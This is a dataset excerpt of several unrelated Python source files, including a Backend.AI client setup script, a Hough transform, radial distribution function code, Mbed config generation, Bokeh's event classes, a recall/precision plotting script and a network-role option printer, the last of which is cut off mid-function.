ext (stringclasses, 9 values) | sha (stringlengths, 40) | content (stringlengths, 3 to 1.04M)
---|---|---|
py | b414fbc399ff388c71367fab273d13c0fd7146ef | from setuptools import setup, find_namespace_packages
from typing import List
from pathlib import Path
import re
setup_requires = [
'setuptools>=54.2.0',
]
install_requires = [
'aiohttp~=3.7.4',
'aiotusclient~=0.1.4',
'appdirs~=1.4.4',
'async_timeout>=3.0',
'attrs>=21.2',
'click>=8.0.1',
'colorama>=0.4.4',
'humanize>=3.1.0',
'janus>=0.6.1',
'multidict>=5.1.0',
'python-dateutil>=2.8.2',
'PyYAML~=5.4.1',
'rich~=10.5.0',
'tabulate>=0.8.9',
'tqdm>=4.61',
'yarl>=1.6.3',
'backend.ai-cli~=0.5.0.post1',
]
build_requires = [
'wheel>=0.36.2',
'twine>=3.4.2',
'towncrier>=21.3.0',
]
test_requires = [
'pytest~=6.2.4',
'pytest-cov',
'pytest-mock',
'pytest-asyncio>=0.15.1',
'aioresponses>=0.7.2',
'codecov',
]
lint_requires = [
'flake8>=3.9.2',
'flake8-commas>=2.1',
]
typecheck_requires = [
'mypy>=0.910',
'types-click',
'types-python-dateutil',
'types-tabulate',
]
dev_requires: List[str] = [
# 'pytest-sugar>=0.9.1',
]
docs_requires = [
'Sphinx~=3.4.3',
'sphinx-intl>=2.0',
'sphinx_rtd_theme>=0.4.3',
'sphinxcontrib-trio>=1.1.0',
'sphinx-autodoc-typehints~=1.11.1',
'pygments~=2.7.4',
]
def read_src_version():
path = (Path(__file__).parent / 'src' /
'ai' / 'backend' / 'client' / '__init__.py')
src = path.read_text(encoding='utf-8')
m = re.search(r"^__version__ = '([^']+)'$", src, re.MULTILINE)
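# e.g. this matches a module line like: __version__ = '21.9.0' (the version shown here is illustrative)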
assert m is not None, 'Could not read the version information!'
return m.group(1)
setup(
name='backend.ai-client',
# Versions should comply with PEP440. For a discussion on single-sourcing
# the version across setup.py and the project code, see
# https://packaging.python.org/en/latest/single_source_version.html
version=read_src_version(),
description='Backend.AI Client for Python',
long_description=Path('README.rst').read_text(encoding='utf-8'),
url='https://github.com/lablup/backend.ai-client-py',
author='Lablup Inc.',
author_email='[email protected]',
license='MIT',
classifiers=[
'Development Status :: 5 - Production/Stable',
'License :: OSI Approved :: MIT License',
'Intended Audience :: Developers',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
'Operating System :: POSIX',
'Operating System :: MacOS :: MacOS X',
'Operating System :: Microsoft :: Windows',
'Environment :: No Input/Output (Daemon)',
'Topic :: Scientific/Engineering',
'Topic :: Software Development',
],
package_dir={'': 'src'},
packages=find_namespace_packages(where='src', include='ai.backend.*'),
python_requires='>=3.8',
setup_requires=setup_requires,
install_requires=install_requires,
extras_require={
'dev': dev_requires,
'build': build_requires,
'test': test_requires,
'lint': lint_requires,
'typecheck': typecheck_requires,
'docs': docs_requires,
},
data_files=[],
package_data={
'ai.backend.client': ['py.typed'],
},
entry_points={
'backendai_cli_v10': [
'_ = ai.backend.client.cli.main:main',
],
},
)
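# The optional dependency groups declared in extras_require above can be combined
# at install time, e.g. (illustrative): pip install -e '.[build,test,lint,typecheck,docs]'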
|
py | b414fc414b482abac8fbaf567a27322775fb7aa2 | # Ref: http://alyssaq.github.io/2014/understanding-hough-transform/
import cv2
import numpy as np
def hough_transform_line(image):
img = image.copy()
ro, theta = 0, 0
# Step 1: detect edges with Canny
img = cv2.Canny(img, 50, 200, 3)
# Step 2: discretize the (theta, rho) parameter space
thetas = np.deg2rad(np.arange(-90.0, 90.0))
h, w = img.shape  # ndarray shape is (rows, cols), i.e. (height, width)
max_ro = int(np.ceil(np.sqrt(w * w + h * h)))  # rho is bounded by the image diagonal
ros = np.linspace(-max_ro, max_ro, max_ro * 2)
cos = np.cos(thetas)
sin = np.sin(thetas)
# Step 3: allocate the Hough accumulator and collect edge pixel coordinates
accumulator = np.zeros((2 * max_ro, len(thetas)), dtype=np.uint64)
y, x = np.nonzero(img)
# Step 4: for each edge pixel, vote for every (rho, theta) line passing through it
for i in range(len(x)):
for j in range(len(thetas)):
ro = int(round(x[i] * cos[j] + y[i] * sin[j]) + max_ro)
accumulator[ro, j] += 1
i = np.argmax(accumulator)
ro = ros[i // accumulator.shape[1]]
theta = thetas[i % accumulator.shape[1]]
return ro, theta, accumulator
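# Minimal usage sketch, assuming OpenCV and NumPy are installed; the synthetic
# image and line endpoints below are illustrative, not from the original file.
if __name__ == '__main__':
    demo = np.zeros((200, 200), dtype=np.uint8)
    cv2.line(demo, (20, 30), (180, 150), 255, 2)   # draw one bright line to recover
    ro, theta, acc = hough_transform_line(demo)
    print('strongest line: rho=%.1f, theta=%.1f deg' % (ro, np.rad2deg(theta)))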
|
py | b414fd048cff6b5933479727287d26c363cc9991 | # -*- coding: utf-8 -*-
import numpy as np
from scipy.spatial import cKDTree
def rdf_2d(pts, nb_bin=100):
r_in = 0.2
r_out = 0.5
r_min = 1e-6
r_max = r_out - r_in
dr = 0.01 # 1.0 / (20*np.sqrt(nb_bin))
print(20 * np.sqrt(nb_bin))
radius = np.arange(r_min, r_max + dr, dr)
distance = np.sqrt(pts[:, 0] ** 2 + pts[:, 1] ** 2)
pts_in = pts[np.where(distance <= r_in)] # pts for measurement
pts_out = pts[np.where(distance <= r_out)] # pts to evaluate
nb_pts_in = pts_in.shape[0]
density = pts.shape[0]
# Compute pairwise correlation for each inner particle pts_in
pairwise = np.asarray([np.sqrt((pt - pts_out)[:, 0] ** 2 + (pt - pts_out)[:, 1] ** 2) for pt in pts_in]).flatten()
pairwise = pairwise[np.where(pairwise <= radius[-1])]
g, bins = np.histogram(pairwise, bins=radius)
normalization = 2 * np.pi * radius[:-1] * dr * nb_pts_in * density
rdf = g / normalization
rdf[0] = 1.0
return rdf, radius[:-1]
def rdf2d(particles, dr, rho=None, eps=1e-15):
particles = particles - np.min(particles, axis=0)
min_x, min_y = np.min(particles, axis=0)
max_x, max_y = np.max(particles, axis=0)
# dimensions of box
w, h = (max_x - min_x), (max_y - min_y)
r_max = (np.min([w, h]) / 2) * 0.8
radii = np.arange(dr, r_max, dr)
g_r = np.zeros(shape=(len(radii)))
nb_pts = len(particles)
if not rho:
rho = nb_pts / (w * h) # number density
# create a KDTree for fast nearest-neighbor lookup of particles
tree = cKDTree(particles)
for r_idx, r in enumerate(radii):
# find all particles that are at least r + dr away from the edges of the box
valid_id = (particles[:, 0] - (r + dr) >= min_x) & (particles[:, 0] + (r + dr) <= max_x) \
& (particles[:, 1] - (r + dr) >= min_y) & (particles[:, 1] + (r + dr) <= max_y)
valid_particles = particles[valid_id]
# compute n_i(r) for valid particles.
for particle in valid_particles:
n = tree.query_ball_point(particle, r + dr - eps, return_length=True) \
- tree.query_ball_point(particle, r, return_length=True)
g_r[r_idx] += n
# normalize
n_valid = len(valid_particles)
shell_vol = np.pi * ((r + dr) ** 2 - r ** 2)
g_r[r_idx] /= n_valid * shell_vol * rho
return radii, g_r
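# Minimal usage sketch, assuming SciPy >= 1.6 (needed for query_ball_point(return_length=True));
# the point count and bin width below are illustrative.
if __name__ == '__main__':
    rng = np.random.default_rng(0)
    pts = rng.random((2000, 2))        # uniform points in the unit square
    radii, g_r = rdf2d(pts, dr=0.02)
    # for uncorrelated points g(r) should fluctuate around 1
    print(radii[:3], g_r[:3])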
|
py | b414fd153e648c439885b18b620f0b729e142557 | #
# Copyright (c) 2020-2021 Arm Limited and Contributors. All rights reserved.
# SPDX-License-Identifier: Apache-2.0
#
"""Parses the Mbed configuration system and generates a CMake config script."""
import pathlib
from typing import Any
from mbed_tools.lib.json_helpers import decode_json_file
from mbed_tools.project import MbedProgram
from mbed_tools.targets import get_target_by_name
from mbed_tools.build._internal.cmake_file import render_mbed_config_cmake_template
from mbed_tools.build._internal.config.assemble_build_config import assemble_config
from mbed_tools.build._internal.write_files import write_file
from mbed_tools.build.exceptions import MbedBuildError
def generate_config(target_name: str, toolchain: str, program: MbedProgram) -> pathlib.Path:
"""Generate an Mbed config file at the program root by parsing the mbed config system.
Args:
target_name: Name of the target to configure for.
toolchain: Name of the toolchain to use.
program: The MbedProgram to configure.
Returns:
Path to the generated config file.
"""
targets_data = _load_raw_targets_data(program)
target_build_attributes = get_target_by_name(target_name, targets_data)
config = assemble_config(target_build_attributes, program.root, program.files.app_config_file)
cmake_file_contents = render_mbed_config_cmake_template(
target_name=target_name, config=config, toolchain_name=toolchain,
)
cmake_config_file_path = program.files.cmake_config_file
write_file(cmake_config_file_path, cmake_file_contents)
return cmake_config_file_path
def _load_raw_targets_data(program: MbedProgram) -> Any:
targets_data = decode_json_file(program.mbed_os.targets_json_file)
if program.files.custom_targets_json.exists():
custom_targets_data = decode_json_file(program.files.custom_targets_json)
for custom_target in custom_targets_data:
if custom_target in targets_data:
raise MbedBuildError(
f"Error found in {program.files.custom_targets_json}.\n"
f"A target with the name '{custom_target}' already exists in targets.json. "
"Please give your custom target a unique name so it can be identified."
)
targets_data.update(custom_targets_data)
return targets_data
|
py | b414fd7f27d5da4a7992c3a0973ab71f4163e448 | #-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2019, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
''' Represent granular events that can be used to trigger callbacks.
Bokeh documents and applications are capable of supporting various kinds of
interactions. These are often associated with events, such as mouse or touch
events, interactive downsampling mode activation, widget or tool events, and
others. The classes in this module represent these different events, so that
callbacks can be attached and executed when they occur.
It is possible to respond to events with ``CustomJS`` callbacks, which will
function with or without a Bokeh server. This can be accomplished by passing
an event class and a ``CustomJS`` model to the
:func:`~bokeh.model.Model.js_on_event` method. When the ``CustomJS`` is
executed in the browser, its ``cb_obj`` argument will contain the concrete
event object that triggered the callback.
.. code-block:: python
from bokeh.events import ButtonClick
from bokeh.models import Button, CustomJS
button = Button()
button.js_on_event(ButtonClick, CustomJS(code='console.log("JS:Click")'))
Alternatively it is possible to trigger Python code to run when events
happen, in the context of a Bokeh application running on a Bokeh server.
This can be accomplished by passing an event class and a callback function
to the :func:`~bokeh.model.Model.on_event` method. The callback should
accept a single argument ``event``, which will be passed the concrete
event object that triggered the callback.
.. code-block:: python
from bokeh.events import ButtonClick
from bokeh.models import Button
button = Button()
def callback(event):
print('Python:Click')
button.on_event(ButtonClick, callback)
.. note ::
There is no throttling of events. Some events such as ``MouseMove``
may trigger at a very high rate.
'''
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
log = logging.getLogger(__name__)
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
# External imports
# Bokeh imports
from .util.future import with_metaclass
#-----------------------------------------------------------------------------
# Globals and constants
#-----------------------------------------------------------------------------
__all__ = (
'ButtonClick',
'DoubleTap',
'Event',
'LODStart',
'LODEnd',
'MenuItemClick',
'MouseEnter',
'MouseLeave',
'MouseMove',
'MouseWheel',
'Pan',
'PanEnd',
'PanStart',
'Pinch',
'PinchEnd',
'PinchStart',
'Rotate',
'RotateEnd',
'RotateStart',
'PlotEvent',
'PointEvent',
'Press',
'Reset',
'SelectionGeometry',
'Tap',
)
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
_CONCRETE_EVENT_CLASSES = dict()
class _MetaEvent(type):
''' Metaclass used to keep track of all classes subclassed from Event.
All Concrete Event classes (i.e. not "abstract" event base classes with
no ``event_name``) will be added to the ``_CONCRETE_EVENT_CLASSES`` dict, which
is used to decode event instances from JSON.
'''
def __new__(cls, clsname, bases, attrs):
newclass = super(_MetaEvent, cls).__new__(cls, clsname, bases, attrs)
if newclass.event_name is not None:
_CONCRETE_EVENT_CLASSES[newclass.event_name] = newclass
return newclass
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
class Event(with_metaclass(_MetaEvent, object)):
''' Base class for all Bokeh events.
This base class is not typically useful to instantiate on its own.
'''
_event_classes = []
event_name = None
def __init__(self, model):
''' Create a new base event.
Args:
model (Model) : a Bokeh model to register event callbacks on
'''
self._model_id = None
if model is not None:
self._model_id = model.id
@classmethod
def decode_json(cls, dct):
''' Custom JSON decoder for Events.
Can be used as the ``object_hook`` argument of ``json.load`` or
``json.loads``.
Args:
dct (dict) : a JSON dictionary to decode
The dictionary should have keys ``event_name`` and ``event_values``
Raises:
ValueError, if the event_name is unknown
Examples:
.. code-block:: python
>>> import json
>>> from bokeh.events import Event
>>> data = '{"event_name": "pan", "event_values" : {"model_id": 1, "x": 10, "y": 20, "sx": 200, "sy": 37}}'
>>> json.loads(data, object_hook=Event.decode_json)
<bokeh.events.Pan object at 0x1040f84a8>
'''
if not ('event_name' in dct and 'event_values' in dct):
return dct
event_name = dct['event_name']
if event_name not in _CONCRETE_EVENT_CLASSES:
raise ValueError("Could not find appropriate Event class for event_name: %r" % event_name)
event_values = dct['event_values']
model_id = event_values.pop('model_id')
event = _CONCRETE_EVENT_CLASSES[event_name](model=None, **event_values)
event._model_id = model_id
return event
class ButtonClick(Event):
''' Announce a button click event on a Bokeh button widget.
'''
event_name = 'button_click'
def __init__(self, model):
from .models.widgets import AbstractButton
if model is not None and not isinstance(model, AbstractButton):
msg = '{clsname} event only applies to button models'
raise ValueError(msg.format(clsname=self.__class__.__name__))
super(ButtonClick, self).__init__(model=model)
class MenuItemClick(Event):
''' Announce a button click event on a Bokeh menu item.
'''
event_name = 'menu_item_click'
def __init__(self, model, item=None):
self.item = item
super(MenuItemClick, self).__init__(model=model)
class PlotEvent(Event):
''' The base class for all events applicable to Plot models.
'''
def __init__(self, model):
from .models import Plot
if model is not None and not isinstance(model, Plot):
msg = '{clsname} event only applies to Plot models'
raise ValueError(msg.format(clsname=self.__class__.__name__))
super(PlotEvent, self).__init__(model=model)
class LODStart(PlotEvent):
''' Announce the start of "interactive level-of-detail" mode on a plot.
During interactive actions such as panning or zooming, Bokeh can
optionally, temporarily draw a reduced set of the data, in order to
maintain high interactive rates. This is referred to as interactive
Level-of-Detail (LOD) mode. This event fires whenever a LOD mode
has just begun.
'''
event_name = 'lodstart'
class LODEnd(PlotEvent):
''' Announce the end of "interactive level-of-detail" mode on a plot.
During interactive actions such as panning or zooming, Bokeh can
optionally, temporarily draw a reduced set of the data, in order to
maintain high interactive rates. This is referred to as interactive
Level-of-Detail (LOD) mode. This event fires whenever a LOD mode
has just ended.
'''
event_name = 'lodend'
class SelectionGeometry(PlotEvent):
''' Announce the coordinates of a selection event on a plot.
Attributes:
geometry (dict) : a dictionary containing the coordinates of the
selection event.
final (bool) : whether the selection event is the last selection event
in the case of selections on every mousemove.
'''
event_name = "selectiongeometry"
def __init__(self, model, geometry=None, final=True):
self.geometry = geometry
self.final = final
super(SelectionGeometry, self).__init__(model=model)
class Reset(PlotEvent):
''' Announce a button click event on a plot ``ResetTool``.
'''
event_name = "reset"
def __init__(self, model):
super(Reset, self).__init__(model=model)
class PointEvent(PlotEvent):
''' Base class for UI events associated with a specific (x,y) point.
Attributes:
sx (float) : x-coordinate of the event in *screen* space
sy (float) : y-coordinate of the event in *screen* space
x (float) : x-coordinate of the event in *data* space
y (float) : y-coordinate of the event in *data* space
Note that data space coordinates are relative to the default range, not
any extra ranges, and the screen space origin is at the top left of
the HTML canvas.
'''
event_name = None
def __init__(self, model, sx=None, sy=None, x=None, y=None):
self.sx = sx
self.sy = sy
self.x = x
self.y = y
super(PointEvent, self).__init__(model=model)
class Tap(PointEvent):
''' Announce a tap or click event on a Bokeh plot.
Attributes:
sx (float) : x-coordinate of the event in *screen* space
sy (float) : y-coordinate of the event in *screen* space
x (float) : x-coordinate of the event in *data* space
y (float) : y-coordinate of the event in *data* space
'''
event_name = 'tap'
class DoubleTap(PointEvent):
''' Announce a double-tap or double-click event on a Bokeh plot.
Attributes:
sx (float) : x-coordinate of the event in *screen* space
sy (float) : y-coordinate of the event in *screen* space
x (float) : x-coordinate of the event in *data* space
y (float) : y-coordinate of the event in *data* space
'''
event_name = 'doubletap'
class Press(PointEvent):
''' Announce a press event on a Bokeh plot.
Attributes:
sx (float) : x-coordinate of the event in *screen* space
sy (float) : y-coordinate of the event in *screen* space
x (float) : x-coordinate of the event in *data* space
y (float) : y-coordinate of the event in *data* space
'''
event_name = 'press'
class MouseEnter(PointEvent):
''' Announce a mouse enter event onto a Bokeh plot.
Attributes:
sx (float) : x-coordinate of the event in *screen* space
sy (float) : y-coordinate of the event in *screen* space
x (float) : x-coordinate of the event in *data* space
y (float) : y-coordinate of the event in *data* space
.. note::
The enter event is generated when the mouse enters the entire Plot
canvas, including any border padding and space for axes or legends.
'''
event_name = 'mouseenter'
class MouseLeave(PointEvent):
''' Announce a mouse leave event from a Bokeh plot.
Attributes:
sx (float) : x-coordinate of the event in *screen* space
sy (float) : y-coordinate of the event in *screen* space
x (float) : x-coordinate of the event in *data* space
y (float) : y-coordinate of the event in *data* space
.. note::
The leave event is generated when the mouse leaves the entire Plot
canvas, including any border padding and space for axes or legends.
'''
event_name = 'mouseleave'
class MouseMove(PointEvent):
''' Announce a mouse movement event over a Bokeh plot.
Attributes:
sx (float) : x-coordinate of the event in *screen* space
sy (float) : y-coordinate of the event in *screen* space
x (float) : x-coordinate of the event in *data* space
y (float) : y-coordinate of the event in *data* space
.. note::
This event can fire at a very high rate, potentially increasing network
traffic or CPU load.
'''
event_name = 'mousemove'
class MouseWheel(PointEvent):
''' Announce a mouse wheel event on a Bokeh plot.
Attributes:
delta (float) : the (signed) scroll speed
sx (float) : x-coordinate of the event in *screen* space
sy (float) : y-coordinate of the event in *screen* space
x (float) : x-coordinate of the event in *data* space
y (float) : y-coordinate of the event in *data* space
.. note::
By default, Bokeh plots do not prevent default scroll events unless a
``WheelZoomTool`` or ``WheelPanTool`` is active. This may change in
future releases.
'''
event_name = 'wheel'
def __init__(self, model, delta=None, **kwargs):
self.delta = delta
super(MouseWheel, self).__init__(model, **kwargs)
class Pan(PointEvent):
''' Announce a pan event on a Bokeh plot.
Attributes:
delta_x (float) : the amount of scroll in the x direction
delta_y (float) : the amount of scroll in the y direction
direction (float) : the direction of scroll (1 or -1)
sx (float) : x-coordinate of the event in *screen* space
sy (float) : y-coordinate of the event in *screen* space
x (float) : x-coordinate of the event in *data* space
y (float) : y-coordinate of the event in *data* space
'''
event_name = 'pan'
def __init__(self, model, delta_x=None, delta_y=None, direction=None, **kwargs):
self.delta_x = delta_x
self.delta_y = delta_y
self.direction = direction
super(Pan, self).__init__(model, **kwargs)
class PanEnd(PointEvent):
''' Announce the end of a pan event on a Bokeh plot.
Attributes:
sx (float) : x-coordinate of the event in *screen* space
sy (float) : y-coordinate of the event in *screen* space
x (float) : x-coordinate of the event in *data* space
y (float) : y-coordinate of the event in *data* space
'''
event_name = 'panend'
class PanStart(PointEvent):
''' Announce the start of a pan event on a Bokeh plot.
Attributes:
sx (float) : x-coordinate of the event in *screen* space
sy (float) : y-coordinate of the event in *screen* space
x (float) : x-coordinate of the event in *data* space
y (float) : y-coordinate of the event in *data* space
'''
event_name = 'panstart'
class Pinch(PointEvent):
''' Announce a pinch event on a Bokeh plot.
Attributes:
scale (float) : the (signed) amount of scaling
sx (float) : x-coordinate of the event in *screen* space
sy (float) : y-coordinate of the event in *screen* space
x (float) : x-coordinate of the event in *data* space
y (float) : y-coordinate of the event in *data* space
.. note::
This event is only applicable for touch-enabled devices.
'''
event_name = 'pinch'
def __init__(self, model, scale=None, **kwargs):
self.scale = scale
super(Pinch, self).__init__(model, **kwargs)
class PinchEnd(PointEvent):
''' Announce the end of a pinch event on a Bokeh plot.
Attributes:
sx (float) : x-coordinate of the event in *screen* space
sy (float) : y-coordinate of the event in *screen* space
x (float) : x-coordinate of the event in *data* space
y (float) : y-coordinate of the event in *data* space
.. note::
This event is only applicable for touch-enabled devices.
'''
event_name = 'pinchend'
class PinchStart(PointEvent):
''' Announce the start of a pinch event on a Bokeh plot.
Attributes:
sx (float) : x-coordinate of the event in *screen* space
sy (float) : y-coordinate of the event in *screen* space
x (float) : x-coordinate of the event in *data* space
y (float) : y-coordinate of the event in *data* space
.. note::
This event is only applicable for touch-enabled devices.
'''
event_name = 'pinchstart'
class Rotate(PointEvent):
''' Announce a rotate event on a Bokeh plot.
Attributes:
rotation (float) : the rotation that has been done (in deg)
sx (float) : x-coordinate of the event in *screen* space
sy (float) : y-coordinate of the event in *screen* space
x (float) : x-coordinate of the event in *data* space
y (float) : y-coordinate of the event in *data* space
.. note::
This event is only applicable for touch-enabled devices.
'''
event_name = 'rotate'
def __init__(self, model, rotation=None, **kwargs):
self.rotation = rotation
super(Rotate, self).__init__(model, **kwargs)
class RotateEnd(PointEvent):
''' Announce the end of a rotate event on a Bokeh plot.
Attributes:
sx (float) : x-coordinate of the event in *screen* space
sy (float) : y-coordinate of the event in *screen* space
x (float) : x-coordinate of the event in *data* space
y (float) : y-coordinate of the event in *data* space
.. note::
This event is only applicable for touch-enabled devices.
'''
event_name = 'rotateend'
class RotateStart(PointEvent):
''' Announce the start of a rotate event on a Bokeh plot.
Attributes:
sx (float) : x-coordinate of the event in *screen* space
sy (float) : y-coordinate of the event in *screen* space
x (float) : x-coordinate of the event in *data* space
y (float) : y-coordinate of the event in *data* space
.. note::
This event is only applicable for touch-enabled devices.
'''
event_name = 'rotatestart'
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
|
py | b414fe133ca862412666a07b905ab221f7a644a8 | import os
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib.lines import Line2D
plt.rcParams.update({'font.size': 12})
plt.rcParams["figure.figsize"] = (8,3)
NUM_EXPS = 5
GRAPH_FORMAT = 'pdf'
# GRAPH_TITLE = 'Piano Playing'
# GRAPH_FILE = 'piano_playing'
GRAPH_TITLE = 'Keyboard Typing'
GRAPH_FILE = 'keyboard_typing'
SUBJECTS_NAMES = ['01', '04', '05', '06', '10', '17', '19', '20', '21', '23', '24', '25']
if GRAPH_FILE == 'piano_playing':
exp_folders = ['/mnt/walkure_public/deanz/models/mfm/us2conf2multimidi_all/mfmunet_224res_8imgs_calib_all_multityping_13_st0.8_sequence_reslayer_retrained_mp_4qloss_kf4',
'/mnt/walkure_public/deanz/models/mfm/us2conf2multimidi_all/mfmunet_224res_8imgs_calib_all_multityping_14_st0.8_sequence_reslayer_retrained_mp_4qloss_kf0',
'/mnt/walkure_public/deanz/models/mfm/us2conf2multimidi_all/mfmunet_224res_8imgs_calib_all_multityping_15_st0.8_sequence_reslayer_retrained_mp_4qloss_kf1',
'/mnt/walkure_public/deanz/models/mfm/us2conf2multimidi_all/mfmunet_224res_8imgs_calib_all_multityping_16_st0.8_sequence_reslayer_retrained_mp_4qloss_kf2',
'/mnt/walkure_public/deanz/models/mfm/us2conf2multimidi_all/mfmunet_224res_8imgs_calib_all_multityping_17_st0.8_sequence_reslayer_retrained_mp_4qloss_kf3']
else:
exp_folders = ['/mnt/walkure_public/deanz/models/mfm/us2conf2multikey_all/mfmunet_224res_8imgs_calib_all_multityping_23_st0.8_sequence_reslayer_retrained_mt_4qloss_kf4',
'/mnt/walkure_public/deanz/models/mfm/us2conf2multikey_all/mfmunet_224res_8imgs_calib_all_multityping_24_st0.8_sequence_reslayer_retrained_mt_4qloss_kf0',
'/mnt/walkure_public/deanz/models/mfm/us2conf2multikey_all/mfmunet_224res_8imgs_calib_all_multityping_25_st0.8_sequence_reslayer_retrained_mt_4qloss_kf1',
'/mnt/walkure_public/deanz/models/mfm/us2conf2multikey_all/mfmunet_224res_8imgs_calib_all_multityping_26_st0.8_sequence_reslayer_retrained_mt_4qloss_kf2',
'/mnt/walkure_public/deanz/models/mfm/us2conf2multikey_all/mfmunet_224res_8imgs_calib_all_multityping_27_st0.8_sequence_reslayer_retrained_mt_4qloss_kf3']
# append all k-fold experiments folders for all subjects
rec_dict, pre_dict = {x:[] for x in SUBJECTS_NAMES}, {x:[] for x in SUBJECTS_NAMES}
for i, exp_dir in enumerate(exp_folders):
for j, subject_name in enumerate(SUBJECTS_NAMES):
subject_metric_df = pd.read_csv(os.path.join(exp_dir, f'metrics_full_df_r{subject_name}.csv'))
rec_dict[subject_name].append(subject_metric_df['rec'].dropna().values)
pre_dict[subject_name].append(subject_metric_df['pre'].dropna().values)
# compute mean and std for each of the subjects
for j, subject_name in enumerate(SUBJECTS_NAMES):
rec_dict[subject_name] = [np.concatenate(rec_dict[subject_name]).mean(), np.concatenate(rec_dict[subject_name]).std()]
pre_dict[subject_name] = [np.concatenate(pre_dict[subject_name]).mean(), np.concatenate(pre_dict[subject_name]).std()]
# plot graph
eps = 5e-2
for j, subject_name in enumerate(SUBJECTS_NAMES):
# plot recall
plt.scatter(j, rec_dict[subject_name][0], marker='^', s=80, color='gold')
lower_bound = max(0, rec_dict[subject_name][0] - rec_dict[subject_name][1])
upper_bound = min(1, rec_dict[subject_name][0] + rec_dict[subject_name][1])
plt.plot([j,j], [lower_bound, upper_bound], color='gold')
plt.text(j+.04, rec_dict[subject_name][0]+.03, str(round(rec_dict[subject_name][0], 3)), fontsize=12, color='darkgoldenrod')
# plot precision
plt.scatter(j + eps, pre_dict[subject_name][0], marker='v', s=80, color='cornflowerblue')
lower_bound = max(0, pre_dict[subject_name][0] - pre_dict[subject_name][1])
upper_bound = min(1, pre_dict[subject_name][0] + pre_dict[subject_name][1])
plt.plot([j + eps,j + eps], [lower_bound, upper_bound], color='cornflowerblue')
plt.text(j+.04, pre_dict[subject_name][0]-.07, str(round(pre_dict[subject_name][0], 3)), fontsize=12, color='royalblue')
colors = ['gold', 'cornflowerblue']
lines = [Line2D([0], [0], color=c, linewidth=3, linestyle='-') for c in colors]
labels = ['Recall', 'Precision']
plt.legend(lines, labels, loc='lower right')
plt.xticks(fontsize=12)
plt.yticks(fontsize=12)
plt.xticks(range(len(SUBJECTS_NAMES)), range(1, len(SUBJECTS_NAMES)+1))
plt.title(GRAPH_TITLE)
plt.grid(True)
plt.tight_layout(pad=0.05)
plt.savefig(os.path.join("metrics_subjects_cigraph_{}.{}".format(GRAPH_FILE, GRAPH_FORMAT)))
|
py | b414fe48618d9cec46f913a9fcc147e184897f2a | # -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2018, 2019.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
""" Optimization test packages """
from .optimization_test_case import QiskitOptimizationTestCase
__all__ = ['QiskitOptimizationTestCase']
|
py | b414fe8be3b2b852664df7cc26fd2ef2bd927c48 | #!/usr/bin/python3 -tt
# SPDX-License-Identifier: BSD-3-Clause
# Helper to print all options that the module in the network role accepts for
# profiles
from collections.abc import Mapping
from collections.abc import Sequence
from copy import deepcopy
from unittest import mock
import os
import sys
PRIORITIES = (
"name",
"type",
"interface_name",
"mac",
"state",
"persistent_state",
"controller",
"port_type",
"parent",
"ignore_errors",
"force_state_change",
"check_iface_exists",
"autoconnect",
"wait",
"zone",
"mtu",
"ip",
"ethernet",
"ethtool",
"bridge",
"bond",
"team",
"vlan",
"wireless",
"macvlan",
"infiniband",
)
import yaml
parentdir = os.path.normpath(os.path.join(os.path.dirname(__file__), ".."))
with mock.patch.object(
sys,
"path",
[parentdir, os.path.join(parentdir, "module_utils/network_lsr")] + sys.path,
):
with mock.patch.dict(
"sys.modules",
{"ansible": mock.Mock(), "ansible.module_utils": __import__("module_utils")},
):
import argument_validator as av
COMMENT = "@@"
EMPTY = "/EMPTY/"
def parse_validator(validator):
default = validator.default_value
if isinstance(validator, av.ArgValidatorDict):
res = {}
for k, v in validator.nested.items():
if (
v.name
not in (
"infiniband_transport_mode",
"infiniband_p_key",
"vlan_id",
)
and not isinstance(v, av.ArgValidatorDeprecated)
):
name = k
if not validator.required:
pass
# name += " DICT optional"
res[name] = parse_validator(v)
elif isinstance(validator, av.ArgValidatorList):
res = [parse_validator(validator.nested)]
elif isinstance(validator, av.ArgValidatorNum):
minval = validator.val_min
maxval = validator.val_max
comment = f" {COMMENT}"
if not validator.required:
comment += " optional"
if minval is not None:
comment += " mininum=" + str(minval)
if maxval:
if maxval == 0xFFFFFFFF:
maxval = hex(maxval)
comment += " maximum=" + str(maxval)
if default is not None:
res = str(default)
elif minval is not None:
res = str(minval)
elif maxval is not None:
res = str(maxval)
else:
res = ""
res += comment
elif isinstance(validator, av.ArgValidatorIP):
res = f"{EMPTY} {COMMENT} IP Address"
elif isinstance(validator, av.ArgValidatorStr):
if default:
res = default
elif validator.enum_values:
res = "|".join(validator.enum_values)
else:
res = EMPTY
if not validator.required:
res += f" {COMMENT} optional"
# res += " " + str(validator.__class__)
elif isinstance(validator, av.ArgValidatorBool):
if default is not None:
res = "yes" if default else "no"
else:
res = "yes|no"
if not validator.required:
res += f" {COMMENT} optional"
else:
res = validator.name + f" {COMMENT} FIXME " + str(validator.__class__)
return res
def represent_dict(dumper, data):
"""
Represent dictionary with insert order
"""
value = []
for item_key, item_value in data.items():
node_key = dumper.represent_data(item_key)
node_value = dumper.represent_data(item_value)
value.append((node_key, node_value))
return yaml.nodes.MappingNode("tag:yaml.org,2002:map", value)
def priority_sorted(data):
if isinstance(data, Sequence) and not isinstance(data, str):
return [priority_sorted(item) for item in data]
if isinstance(data, Mapping):
sorted_data = {}
for key in sorted(data, key=prioritize):
sorted_data[key] = priority_sorted(data[key])
return sorted_data
return deepcopy(data)
def prioritize(key):
try:
priority = PRIORITIES.index(key)
